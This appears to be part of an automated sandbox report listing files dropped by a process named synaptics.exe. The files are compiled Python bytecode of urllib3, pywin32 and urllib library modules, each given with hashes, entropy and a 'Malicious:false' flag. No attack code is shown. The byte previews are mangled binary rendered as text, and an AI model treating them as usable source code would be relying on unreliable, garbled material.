                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15743
                                                                                                                                                                                                                Entropy (8bit):5.359642978489926
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:Uf/rj12FuuccXjtRLJIkyuhvCTe247+TiEj0bPkCeb31I2s5P7SXR:UssuPVJvCTe7AiGiPkCeRmPmXR
                                                                                                                                                                                                                MD5:09CE0C499A2F53CB23B1C63C079EC7B5
                                                                                                                                                                                                                SHA1:161F57F81051ECCB2C51AE056412E5B1534FDC86
                                                                                                                                                                                                                SHA-256:7985B0B6352AFA6DFA1CF16DFF7BBFCD53F483842BE18C01AE9EC7F8A127919F
                                                                                                                                                                                                                SHA-512:7AB91D03A9B3F6E296CEFD8454C9BF9DB9DD21F366F3539E6F5ACA908864A0BC4740253DB00C63D8830D29CCD35F2D10086A45B7150BF8B078346083C3BD5B54
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.H.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.j.rWd.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...e...Z.G.d.d...d.e.j ..Z!G.d.d...d...Z"e"d...e"_#d.S.)......)...annotationsN)...takewhile)...TracebackType.....)...ConnectTimeoutError..InvalidHeader..MaxRetryError..ProtocolError..ProxyError..ReadTimeoutError..ResponseError.....)...reraise)...Self)...ConnectionPool)...BaseHTTPResponsec....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...RequestHistory..str | None..method..url..Exception | None..error..int | None..status..redirect_locationN)...__name__..__module__..__qualname__..__annotations__..r....r.....AC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\retry.pyr....!...s................r....c....................@...s"...e.Z.d.Z.U.d.Z.e.g.d.....Z.e.g.d.....Z.e.g.d.....Z.d.Z.d.e.d.<.d.d.d.d.d.d.e.d.d.e.d.d.d.d.e.d.f.dbd'd(..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):12455
                                                                                                                                                                                                                Entropy (8bit):5.651798450911448
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:JjkLm6642sli6M00PVnGAKK1JK9CpdJyKm2ggAgbO7:hu/luBtn/DyKMgAgbO7
                                                                                                                                                                                                                MD5:EE0C236A8CF576EAC38BEBEA71319991
                                                                                                                                                                                                                SHA1:14CB6942D1C12C17CB39409FD7934D4649DB2072
                                                                                                                                                                                                                SHA-256:068628DC03936B11A8EF0C942B89166B5511766926B3E802AF05023AC86F9924
                                                                                                                                                                                                                SHA-512:AE5E0DF3E41DF7FF828EF7F10B8A144465544092955D2496451484A73042D9390EAAB47E508169C9D2C290E056C44FD16886AFDC78010067F48A7E8D592CAF54
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f&K.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.g.Z.e.j.e.e.e.e.e.f...Z.d.d...d.D...Z.dcd.d...Z.ddd.d...Z.e.j.r~d.d.l.m.Z...d.d.l.m Z ..d.d.l!m.Z"..G.d.d ..d e d.d!..Z#i.Z$d"e%d#<.z_d.d.l.Z.d.d$l.m&Z&m.Z.m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z.m.Z.m/Z/..e+Z0e.r.e.e)e*e.j1j2e.j3e.j1j2d%k.r.e.j4n.d...s.d.Z.d&D.].Z5z.e6e/e5..e$e6e.d'e5......<.W.q...e7y.......Y.q.w.d.d.l!m.Z...W.n...e8y.......d(Z'd)Z(d*Z-d+Z.d...Z0Z+d,Z,Y.n.w.e.j9d e:d.f...Z;ded1d2..Z<dfd6d7..Z=dgd8d9..Z>............dhdidCdD..Z?e.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdkdUdV....ZAe.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdldXdV....ZA........................dmdldYdV..ZAdnd\d]..ZBdod_d`..ZC..dpdqdadb..ZDd.S.)r.....)...annotationsN)...unhexlify.....)...ProxySchemeUnsupported..SSLError.....)..._BRACELESS_IPV6_ADDRZ_RE.._IPV4_REFz.http/1.1c....................C...s....i.|.].\.}.}.|.t.t.|.d.....q.S...N)...getattr..hashlib)....0..le
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3699
                                                                                                                                                                                                                Entropy (8bit):5.705228296269038
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:BY/R/mVkAMdqu1vkAlH2TIYxfyRGH0MYUFgAL8IzE+wqq3:BXuA2MAV07xjHTgh2Etqq3
                                                                                                                                                                                                                MD5:D7BD78CC7296980839A6DF64EAB71A65
                                                                                                                                                                                                                SHA1:45DABF563809951A9D785270D994127B60A25964
                                                                                                                                                                                                                SHA-256:0A3A9ED5965FCE558F9D0DB216E4084AF084BE6CCE8E510E55676304D0836278
                                                                                                                                                                                                                SHA-512:1E60FF570FE071F7754F19AC823545D4687F9AC8B265C17D8F8F73544258A5C1F7A48CD5FC11A83F2934758382FEA60ACEF1A1702992A85DEDE5A23B384E113E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...e.j.r%d.d.l.m.Z...d.Z.G.d.d...d.e...Z...d!d"d.d...Z.d#d.d...Z...d$d%d.d ..Z.d.S.)&zHThe match_hostname() function from Python 3.5, essential when using SSL......)...annotationsN)...IPv4Address..IPv6Address.....)..._TYPE_PEER_CERT_RET_DICTz.3.5.0.1c....................@...s....e.Z.d.Z.d.S.)...CertificateErrorN)...__name__..__module__..__qualname__..r....r.....NC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\ssl_match_hostname.pyr........s........r......dn..typing.Any..hostname..str..max_wildcards..int..return..typing.Match[str] | None | boolc....................C...s....g.}.|.s.d.S.|...d...}.|.d...}.|.d.d.....}.|...d...}.|.|.k.r&t.d.t.|.........|.s2t.|.....|.....k...S.|.d.k.r<|...d.....n.|...d...sF|...d...rO|...t...|.......n.|...t...|.....d.d.......|.D.].}.|...t...|.......q]t...d.d...|.....d...t.j...}.|...|...S.).zhMatching according to RFC 6125, section 6.4.3.. http://tools
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9415
                                                                                                                                                                                                                Entropy (8bit):5.262963737429366
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:v330cuKX0dSvpkv9nfgC+JCdABK1sdIDv5YaBbcMhu:v330lKYSvp4tdcYsyxBYWu
                                                                                                                                                                                                                MD5:44B29AB810FD9E88FAE34098D42B3E9D
                                                                                                                                                                                                                SHA1:08F53C95221CF4CB8F1F75260813668B07391B3B
                                                                                                                                                                                                                SHA-256:3A1E4607968F5CFF651773FBF8430408A0CDA718A53AF06012820090D8966B74
                                                                                                                                                                                                                SHA-512:CC575459B817C5822F7AC0F82E8D3B8DBEA95063D6F48D7772518EC8F21A6586F6C4E7B1F40C6A4212B408017995C2CF3E4495BB5AC2439333F8DCA05FC57DDC
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.".......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.j.r-d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.e.f...Z.e...d...Z.d.Z.G.d.d...d...Z.d.S.)......)...annotationsN.....)...ProxySchemeUnsupported)...Self.....)..._TYPE_PEER_CERT_RET.._TYPE_PEER_CERT_RET_DICT.._ReturnValuei.@..c....................@...s....e.Z.d.Z.d.Z.e.dsd.d.....Z.....dtdud.d...Z.dvd.d...Z.dwd.d...Z.dxd.d...Z.dydzd!d"..Z.d{d|d&d'..Z....#d}d~d,d-..Z.d.d.d0d1..Z.d.d.d2d3..Z...d.d.d.d.d4..d.d<d=..Z.d.d>d?..Z.d.d@dA..Z.e.j..Bd.d.dFdG....Z.e.j.d.dJdG....Z.d.d.dMdG..Z.d.dNdO..Z.d.dQdR..Z.d.dSdT..Z.d.dVdW..Z.d.dXdY..Z.d.d\d]..Z.d.d^d_..Z.d.d`da..Z.d.d.dcdd..Z.e.j.d.dgdh....Z.e.j.d.dkdh....Z.e.j.d.dndh....Z.....d.d.drdh..Z.d.S.)...SSLTransportaL.... The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. i
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9595
                                                                                                                                                                                                                Entropy (8bit):5.128717436036065
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:n08aOMrflhdz+7V0MV8K7byybXiCDzQyFF/LCfAChn8l/qxzWOBGawWy8I81GZ5e:ndqn+l/ucy80CBXPqGrpjMKfQHcsyJO
                                                                                                                                                                                                                MD5:09765EA504905D44D8CF0C156771D946
                                                                                                                                                                                                                SHA1:93B45F6CD61374F9E47ED4438FB0314ED31854C4
                                                                                                                                                                                                                SHA-256:32585620806F2CC134ECCE834A9BA585F59287685BF04237D587C14F5C4B3EB9
                                                                                                                                                                                                                SHA-512:391A99DF2117CFF3AA6F6DFEFC6E9F0F18543297E6830DDB897FFDB5E15EFEF4FC2AE42AEE544B9A4DBD84599178A46C52DE246CA4054A364D093823786E6620
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fj(.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r*d.d.l.m.Z...G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.j.e.e.f.....Z.G.d.d...d...Z.d.S.)......)...annotationsN)...Enum)...getdefaulttimeout.....)...TimeoutStateError)...Finalc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_DEFAULT.....N)...__name__..__module__..__qualname__..token..r....r.....CC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\timeout.pyr........s........r....z.Final[_TYPE_DEFAULT].._DEFAULT_TIMEOUTc....................@...s....e.Z.d.Z.U.d.Z.e.Z.d.e.d.<.d.e.e.f.d$d.d...Z.d%d.d...Z.e.Z.e.d&d.d.....Z.e.d'd.d.....Z.e.d(d.d.....Z.d)d.d...Z.d*d.d...Z.d*d.d...Z.e.d+d d!....Z.e.d,d"d#....Z.d.S.)-..Timeouta....Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. import urllib3.. timeout = urllib3.util.Timeout(connect=2.0, read=7.0).. http = urllib3.PoolManager(timeout=timeout)..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11233
                                                                                                                                                                                                                Entropy (8bit):5.7819118985059
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:pVOJKgt54KqlH/qu/QFYP0YU5HqDEuwqSvqi1D5hlSdm0ICwqW4q5cPoBTJqovLV:pVeKgt54KqVquoJxHqDEuwqSvqi1D5XJ
                                                                                                                                                                                                                MD5:9F42C9A508E5E77A36F1A87DE86BCFAF
                                                                                                                                                                                                                SHA1:9D5AB6A90FDA9A6F244C4F376F6FD22FFE0FD5F9
                                                                                                                                                                                                                SHA-256:D9A64C124E2916E9BF385D980C345FD712ADDA53A1666A75BCDECADB1DFFEC1E
                                                                                                                                                                                                                SHA-512:B0B2A38B82A1AA0E7F10F46D86DC67349C5586D3D46904F65065604832B6A71B0A4DDB5611435B390DD6CE37652C09C5618524402E6458DCC9894E89C66FB3AB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fm;.......................@...s~...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.e...d...Z.e...d...Z.e...d.e.j.e.j.B...Z.d.Z.d.Z.d.j.e.e.d...Z.e.e.d...Z.g.d...Z.d.Z.d.d...d.d...e.D.......d...Z.d.e...d...Z.d.e...d...e...d...Z.d.Z.e...d...Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e.d.d.......d.....Z.e...d e...d!....Z d"e.e.e.f...Z!e...e!e.j.e.j.B...Z"e#d#..Z$e#d$..Z%e$e%B.d%h.B.Z&e&d&d'h.B.Z'e'd(h.B...Z(Z)G.d)d*..d*e..*d*d+e.j+e,..f.d,e.j+e,..f.d-e.j+e,..f.d.e.j+e-..f.d/e.j+e,..f.d0e.j+e,..f.d1e.j+e,..f.g.....Z.e.j/dMd7d8....Z0e.j/dNd:d8....Z0dOd<d8..Z0dPd=d>..Z1e.j/dQd?d@....Z2e.j/dRdAd@....Z2dSdBd@..Z2dTdEdF..Z3dUdHdI..Z4dVdKdL..Z5d.S.)W.....)...annotationsN.....)...LocationParseError.....)...to_str)...http..httpsNz.%[a-fA-F0-9]{2}z.^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)zS^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?(?://([^\\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?$z.(?:[0-9]{1,3}\.){3}[0-9]{1,3}z.[0-9A-Fa-f]{1,4}z.(?:{hex}:{hex}|{ipv4}))...hexZ.ipv4).r....Z.ls32).
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1204
                                                                                                                                                                                                                Entropy (8bit):5.016396202961232
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:T2LkVMQdXRjkhlcRaGyz4tMXSwgpsqnud9Qzm+6IErGXTSu:9MQdBYhlcGWp1KQ9+GXmu
                                                                                                                                                                                                                MD5:30979203B7E5DFF196E491E9C1A46053
                                                                                                                                                                                                                SHA1:57F3200F1A1A9797F8289DBB70383C379BAE10C7
                                                                                                                                                                                                                SHA-256:B1CCF97650295DF50753B543596275C33A594CEF696460BE36527360FE9DA62B
                                                                                                                                                                                                                SHA-512:DAF794B63903E42C66196C3E76EAFB4632009F0F9FFB46D9D0C6A7BEDE891F3E88A5F701AE4A2E7352D67951DE52CA40009D1854A266AB906073C6DF01A5E03C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fz........................@...sN...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....d.d.d.d...Z...d.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...TracebackType..x..str | bytes..encoding..str | None..errors..return..bytesc....................C....R...t.|.t...r.|.S.t.|.t...s.t.d.t.|...j.........|.s.|.r%|.j.|.p.d.|.p"d.d...S.|.....S...Nz.not expecting type z.utf-8..strict).r....)...isinstancer......str..TypeError..type..__name__..encode..r....r....r......r.....@C:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\util.py..to_bytes.......................r....r....c....................C...r....r....).r....r....r....r....r....r......decoder....r....r....r......to_str....r....r......tp..type[BaseException] | None..value..BaseException..tb..TracebackType | None..typing.NoReturnc....................C...s$...z.|.j.|.u.r.|...|.....|...d.}.d.}.w...N)...__traceback__..with_traceback).r....r....r....r....r....r......reraise....s................r%...).NN).r....r....r....r....r....r....r....r
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2383
                                                                                                                                                                                                                Entropy (8bit):5.13640242905248
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:Xy6A4HN1SSpUMQYvX7ws85K4CE8uG9G0N3Ae8wWv9O3ArDiPh:Xy6A4HT1pZvX7h0mh9GcAFwWlIArDiPh
                                                                                                                                                                                                                MD5:4BC75DB12E8FDB76755BC77A840415C3
                                                                                                                                                                                                                SHA1:F77335FEDE3152B765231D8C7AB5D59F05D32CC3
                                                                                                                                                                                                                SHA-256:03423A188BACFF6C84D4811D0BE7FA269FA5786778B37557C592F043FAF63508
                                                                                                                                                                                                                SHA-512:E62016941B9BDCEFECC45EF994749B1934B8CAFF5C89AE4819652E29A699D757AF135F676CB6E7551B4D3F6485A2C2986F44F0375E894CE11AF38021278EBF47
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fG........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.......d.d.d.d...Z.......d.d.d.d...Z.d.d.d...Z.......d.d.d.d...a.d.d.d.d...Z.d.d.d.d...Z.d.S.)......)...annotationsN)...partial..wait_for_read..wait_for_writeF..sock..socket.socket..read..bool..write..timeout..float | None..returnc....................C...sb...|.s.|.s.t.d.....g.}.g.}.|.r.|...|.....|.r.|...|.....t.t.j.|.|.|...}.|.|...\.}.}.}.t.|.p/|.p/|...S.).N.2must specify at least one of read=True, write=True)...RuntimeError..appendr......selectr....).r....r....r....r....Z.rcheckZ.wcheck..fnZ.rreadyZ.wreadyZ.xready..r.....@C:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\wait.py..select_wait_for_socket!...s..........................r....c........................s^...|.s.|.s.t.d.....d.}.|.r.|.t.j.O.}.|.r.|.t.j.O.}.t...........|.|.....d...f.d.d...}.t.|.|.....S.).Nr....r......tr....r......list[tuple[int, int]]c........................s....|.d.u.r.|.d.9.}.....|...S.).Ni....)...poll).r.....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):509
                                                                                                                                                                                                                Entropy (8bit):5.41570133179208
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/tLlUA1pAZVsrPkf0rjyl3KZX43d4AQILXyJ4hs2onBMigt0lB3+uGuFM9Ar4uY:CtRtWsrPJeMS4OjyJasv6OlBh+ztmm
                                                                                                                                                                                                                MD5:537EA528919515561FEC7CB8532E95D0
                                                                                                                                                                                                                SHA1:9F151B147FBAF45E4DC3B5A3DE4BF70D029FAEDF
                                                                                                                                                                                                                SHA-256:5180E463FEB40452B891EFA7C89D7FEDCF799603603006E626B3D35B16C77199
                                                                                                                                                                                                                SHA-512:8D5A074DE5B69AA3553F1C8D63CE66D24A78F5958A983200552D22EF98E13ACD232C7295D93441CA933B8FD84B698773FC07FFCF3249F14319CBE60236FD7BA7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....JC:\Users\user\Desktop\tmp\lib\site-packages\win32\lib\pywin32_bootstrap.py..<module>....s".....................................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):141
                                                                                                                                                                                                                Entropy (8bit):4.1622667835290645
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:y/Ve0/lylluleh/wZWemPT6MWRIFMHJZqOkcTgp:y/00/ly/qeh/w6GuFMpAu4
                                                                                                                                                                                                                MD5:8DB4EEE6CD7DF1EAB8AFD75B0318C49F
                                                                                                                                                                                                                SHA1:4E528B2656EAAE5D617CB7E9F21AF1C167FC8811
                                                                                                                                                                                                                SHA-256:9426BD505E50312ED81AD728153456D60BF5AE5CBDCF3272C72F972CA2B78DF3
                                                                                                                                                                                                                SHA-512:047ED9B278E6D471FF1D26DF488ED0B872D5347BDCEB51EB80078B2DCB1279EA33D9FBEDE7B8D4D6A4A86EFBE04199FD311D34B12E8BBE0370B88C70C10E4501
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.S.).N..r....r....r.....0C:\Users\user\Desktop\tmp\lib\urllib\__init__.py..<module>....s......
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2863
                                                                                                                                                                                                                Entropy (8bit):4.898653227149666
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:nSbuQshuDSkJ8eJ/JiWqgpHO26ZenDxp/mdveDI8JG/UOUPkjKbMrHoYwqmAMlna:SbuyDSkJ8eJ/JmgpHF/DxwdveDI84/Ue
                                                                                                                                                                                                                MD5:784BB4FE053D202E61EAF63A854821E0
                                                                                                                                                                                                                SHA1:54A6CE3CDC9CEC4CA46A3DF61AD7CC6357562F1C
                                                                                                                                                                                                                SHA-256:6DBAAC4B53A466D54A7E4FAB1078C93C3A072A2E1DD5D4B7B82D19A78F2E7F2A
                                                                                                                                                                                                                SHA-512:42527163A2A6783F05AE09D71A59A53FF2F239FD72E6A867D3184515C5CDAC64176C44A9E67053446D9E5F64F8286EF4737E3B17DC482CBA9E1DA6B46D3EFA7E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sV...d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e.j.j...Z.G.d.d...d.e...Z.d.S.).a....Exception classes raised by urllib...The base exception class is URLError, which inherits from OSError. It.doesn't define any behavior of its own, but is the base class for all.exceptions defined in this package...HTTPError is an exception class that is also a valid HTTP response.instance. It behaves this way because HTTP protocol errors are valid.responses, with a status code, headers, and a body. In some contexts,.an application may want to handle an exception like a regular.response.......N)...URLError..HTTPError..ContentTooShortErrorc....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s$...|.f.|._.|.|._.|.d.u.r.|.|._.d.S.d.S...N)...args..reason..filename)...selfr....r......r.....-C:\Users\user\Desktop\tmp\lib\urllib\error.py..__init__....s..............z.URLError.__init__c....................C...s....d.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):33786
                                                                                                                                                                                                                Entropy (8bit):5.442048077873133
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:8Gxj6W55iUzXy6A9T7A7jJ7IreL5xo5Im4QfiOSMKAsrhZWB3qrwp01i3mr/Cd:8Gx1qTU5cra/oLbKAkh8B3qrwapjCd
                                                                                                                                                                                                                MD5:017F79F4712E579508666B47B7F22278
                                                                                                                                                                                                                SHA1:552D59357C626EF303BE1D2E1F4ACDF0F6EE7E6D
                                                                                                                                                                                                                SHA-256:40D803B6F0CBC582544C7DD236118B7FD5B4ED7525E181DF786865E1F61EA133
                                                                                                                                                                                                                SHA-512:56A1BB3B4E73E8B561433245711F5271CF51BA1698AC6CFF97978A138936265C6FCFF4706856DB9919F98379DD9C8256DBA6F515D8B37BEAAE87C02DBDCF18F7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.d.Z.g.d...Z.d.Z.i.Z.d.d...Z.d.Z.d.Z.d.d...Z.e.e.f.d.d...Z.e.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.d.d#l.m.Z...e.d$d%..Z.e.d&d'..Z e.d(d)..Z!d*e._.d+e.j"_.d,e.j#_.d-e _.d.e j$_.d/e j%_.d0e j&_.d1e j'_.d2e j#_.d3e!_.e j$j.e!j$_.e j%j.e!j%_.e j&j.e!j&_.d4e!j(_.e j'j.e!j'_.e j#j.e!j#_.e.Z)G.d5d$..d$e.e...Z*G.d6d&..d&e e...Z+G.d7d(..d(e!e...Z,G.d8d9..d9e.e...Z-G.d:d;..d;e e...Z.G.d<d=..d=e!e...Z/d>d?..Z0e0....[0d.dBdC..Z1dDdE..Z2d.dFdG..Z3dHdI..Z4d.dJdK..Z5dLdM..Z6dNdO..Z7d.dPdQ..Z8dRdS..Z9dTZ:d.a;dUdV..Z<e..=dW..Z>d.dZd[..Z?.\.]d.d^d_..Z@.\.]d.d`da..ZAd.dbdc..ZBeCdd..ZDeEeD..ZFi.ZGG.dedf..dfe.jH..ZId.dhdi..ZJd.djdk..ZKd.dldm..ZLd\d@d.d.eKf.dndo..ZMdpdq..ZNdrds..ZOdtdu..ZPdvdw..ZQd.aRdxdy..ZSdzd{..ZTd.aUd|d}..ZVd~d...ZWd.d...ZXd.d...ZYd.d...ZZd.d...Z[d.a\d.d...Z]d.d.d...Z^d.d.d...Z_
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):71348
                                                                                                                                                                                                                Entropy (8bit):5.431417920680078
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:OZcvBQtoBL6sxVuJaP6IMydlT2rQuyHuQfaC6x4oinfTQcJ0:OWqtU6AI663Qu46ufMY0
                                                                                                                                                                                                                MD5:6C8B7B62A5F52DAC7AE3F18BE83A3DAF
                                                                                                                                                                                                                SHA1:F5A4AC385C0A2FB928CA920EACEF719842CDA093
                                                                                                                                                                                                                SHA-256:205402805E704EB40C7EE9F284A7B4DAEF5533A066147141A9338F6B8C65D7B6
                                                                                                                                                                                                                SHA-512:E99464C9F8046166C4BC6C61EA121ABB8620837CA90A781109679E6ED23435E09A579CE07168057CC2C85DDD4FB22463B9B24C87D801F3D6852923A96F9D2C1E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*m+Z+..z.d.d.l,Z,W.n...e-y.......d.Z.Y.n.w.d.Z.g.d...Z/d.e.j0d.d.......Z1d.a2d.e.j3f.d.d.d.d.d...d.d...Z4d.d...Z5g.Z6d.d.d...Z7d.d...Z8e..9d.e.j:..Z;d.d...Z<G.d.d...d...Z=G.d.d...d...Z>d.d...Z?G.d.d...d...Z@G.d.d ..d e@..ZAG.d!d"..d"e@..ZBG.d#d$..d$e@..ZCd%d&..ZDG.d'd(..d(e@..ZEG.d)d*..d*..ZFG.d+d,..d,eF..ZGG.d-d...d.eG..ZHG.d/d0..d0..ZIG.d1d2..d2eIe@..ZJG.d3d4..d4eIe@..ZKe.jLZMG.d5d6..d6..ZNG.d7d8..d8e@eN..ZOG.d9d:..d:e@eN..ZPG.d;d<..d<e@..ZQG.d=d>..d>eQ..ZReSe.jTd?....rtG.d@dA..dAeQ..ZUe/.VdA....G.dBdC..dCe@..ZWG.dDdE..dEe@..ZXdFdG..ZYdHdI..ZZG.dJdK..dKe@..Z[dLdM..Z\G.dNdO..dOe@..Z]G.dPdQ..dQe]..Z^G.dRdS..dSe@..Z_dTZ`e.jadUk...r.d.dVlbmcZcmdZd..n.dWdX..ZcdYdZ..Zdi.ZeG.d[d\..d\..ZfG.d]d^..d^ef..Zgd.ahd_
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3477
